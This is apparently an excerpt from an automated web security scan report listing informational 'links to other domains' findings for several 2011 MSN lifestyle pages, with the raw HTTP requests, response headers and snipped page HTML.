<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345057&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FFamous-escapes.aspx%3Fcp-documentid%3D27422805%26imageindex%3D1&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=famous+escapes&form=msnhal"><strong>
...[SNIP]...
<div>As long as there have been ways to incarcerate people -- whether <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=prisons&form=msnhal">behind bars</a> or <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=slavery&form=msnhal">through immoral ownership</a> -- there have been escapes. Some are unsuccessful, such as the recent case of a 20-year-old man who jumped out of a moving police car, pictured here. (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Nicholas+Duffy+friction+burns+to+hands&form=msnhal">Find out</a> what his injuries were.) And others are daring and brave and are among some of the most <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=famous+escapes&form=msnhal">famous escapes in history</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.323. http://specials.redacted/A-List/Lifestyle/Famous-escapes.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Famous-escapes.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Lifestyle/Famous-escapes.aspx?cp-documentid=27422805&imageindex=1

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?q=Nicholas+Duffy+friction+burns+to+hands&form=msnhal
http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm
http://www.bing.com/search?q=famous+escapes&form=msnhal
http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm
http://www.bing.com/search?q=prisons&form=msnhal
http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm
http://www.bing.com/search?q=slavery&form=msnhal
http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406672&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FFamous-escapes.aspx%3Fcp-documentid%3D27422805%26imageindex%3D1&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:57:52 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA53
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=efddc12812564ba6a80ea05f8f5b6321; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=DD660A4C77AF420BB580B7A65058D295; domain=.redacted; expires=Thu, 18-Aug-2011 16:57:52 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 32843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406672&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FFamous-escapes.aspx%3Fcp-documentid%3D27422805%26imageindex%3D1&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=famous+escapes&form=msnhal"><strong>
...[SNIP]...
<div>As long as there have been ways to incarcerate people -- whether <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=prisons&form=msnhal">behind bars</a> or <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=slavery&form=msnhal">through immoral ownership</a> -- there have been escapes. Some are unsuccessful, such as the recent case of a 20-year-old man who jumped out of a moving police car, pictured here. (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Nicholas+Duffy+friction+burns+to+hands&form=msnhal">Find out</a> what his injuries were.) And others are daring and brave and are among some of the most <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=famous+escapes&form=msnhal">famous escapes in history</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.324. http://specials.redacted/A-List/Lifestyle/Mom-kills-teens.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Mom-kills-teens.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Lifestyle/Mom-kills-teens.aspx?cp-documentid=27465807

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?q=Schenecker+blood+on+the+back+porch&form=msnpop
http://www.bing.com/search?q=Schenecker+husband+middle+east&form=msnpop
http://www.bing.com/search?q=Schenecker+shot+son+soccer&form=msnpop
http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm
http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm
http://www.bing.com/search?q=julie+powers+schenecker+kids&form=msnpop
http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm
http://www.bing.com/search?q=susan+smith&form=msnpop
http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406692&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FMom-kills-teens.aspx%3Fcp-documentid%3D27465807&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Lifestyle/Mom-kills-teens.aspx?cp-documentid=27465807 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:58:12 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=fff6a85e320f450ca15afa15de89cce2; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=B6089F17DDD649A4A9961B27ECEBF7C0; domain=.redacted; expires=Thu, 18-Aug-2011 16:58:12 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 22875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406692&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FMom-kills-teens.aspx%3Fcp-documentid%3D27465807&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=julie+powers+schenecker+kids&form=msnpop"><strong>
...[SNIP]...
<div>Florida police say Julie Powers Schenecker admitted to <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=julie+powers+schenecker+kids&form=msnpop">killing her teen son and daughter</a> this week... She shot her son first for 'talking back' while she was driving (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Schenecker+shot+son+soccer&form=msnpop">where were they going?</a>
...[SNIP]...
<div>Some people say Schenecker's case is similar <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=susan+smith&form=msnpop">to another mother's</a>
...[SNIP]...
<div>Police found Schenecker at her Tampa home <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Schenecker+blood+on+the+back+porch&form=msnpop">in an odd state</a>
...[SNIP]...
<div>Her husband <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Schenecker+husband+middle+east&form=msnpop">was not home</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.325. http://specials.redacted/A-List/Lifestyle/Mom-kills-teens.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Mom-kills-teens.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Lifestyle/Mom-kills-teens.aspx?cp-documentid=27465807

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?q=Schenecker+blood+on+the+back+porch&form=msnpop
http://www.bing.com/search?q=Schenecker+husband+middle+east&form=msnpop
http://www.bing.com/search?q=Schenecker+shot+son+soccer&form=msnpop
http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm
http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm
http://www.bing.com/search?q=cilantro+recall&form=msnhpm
http://www.bing.com/search?q=julie+powers+schenecker+kids&form=msnpop
http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm
http://www.bing.com/search?q=susan+smith&form=msnpop
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345073&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FMom-kills-teens.aspx%3Fcp-documentid%3D27465807&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:13 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=6f494a921fdc485c8843f5bbaf4f4e90; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=AB17CF22AE0A44B785FDC70A0F4F0244; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:13 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 22895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345073&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FMom-kills-teens.aspx%3Fcp-documentid%3D27465807&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=julie+powers+schenecker+kids&form=msnpop"><strong>
...[SNIP]...
<div>Florida police say Julie Powers Schenecker admitted to <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=julie+powers+schenecker+kids&form=msnpop">killing her teen son and daughter</a> this week... She shot her son first for 'talking back' while she was driving (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Schenecker+shot+son+soccer&form=msnpop">where were they going?</a>
...[SNIP]...
<div>Some people say Schenecker's case is similar <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=susan+smith&form=msnpop">to another mother's</a>
...[SNIP]...
<div>Police found Schenecker at her Tampa home <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Schenecker+blood+on+the+back+porch&form=msnpop">in an odd state</a>
...[SNIP]...
<div>Her husband <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Schenecker+husband+middle+east&form=msnpop">was not home</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.326. http://specials.redacted/A-List/Lifestyle/Nathan-Woods-dies.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Nathan-Woods-dies.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Lifestyle/Nathan-Woods-dies.aspx?cp-documentid=27467027

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm
http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm
http://www.bing.com/search?q=cilantro+recall&form=msnhpm
http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm
http://www.bing.com/search?q=most+dangerous+jobs&form=msnpop
http://www.bing.com/search?q=nathan+woods+dies&go=&form=msnpop
http://www.bing.com/search?q=tj+lavin+crash&form=msnpop
http://www.bing.com/search?q=worcs+motorcycle+racing&FORM=msnpop
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/watch/video/nathan-woods-on-a-husaberg-for-2010-worcs/4dd9d135770901d9f3694dd9d135770901d9f369-418410135638?q=nathan+woods&FROM=LKVR5&GT1=LKVR5&FORM=msnpop
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345068&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FNathan-Woods-dies.aspx%3Fcp-documentid%3D27467027&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Lifestyle/Nathan-Woods-dies.aspx?cp-documentid=27467027 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:08 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=8b410cf2be0f4ee8ad921b52aa54a346; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=A0389BD7DD28409BB2107D75F4993368; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:08 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 22612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
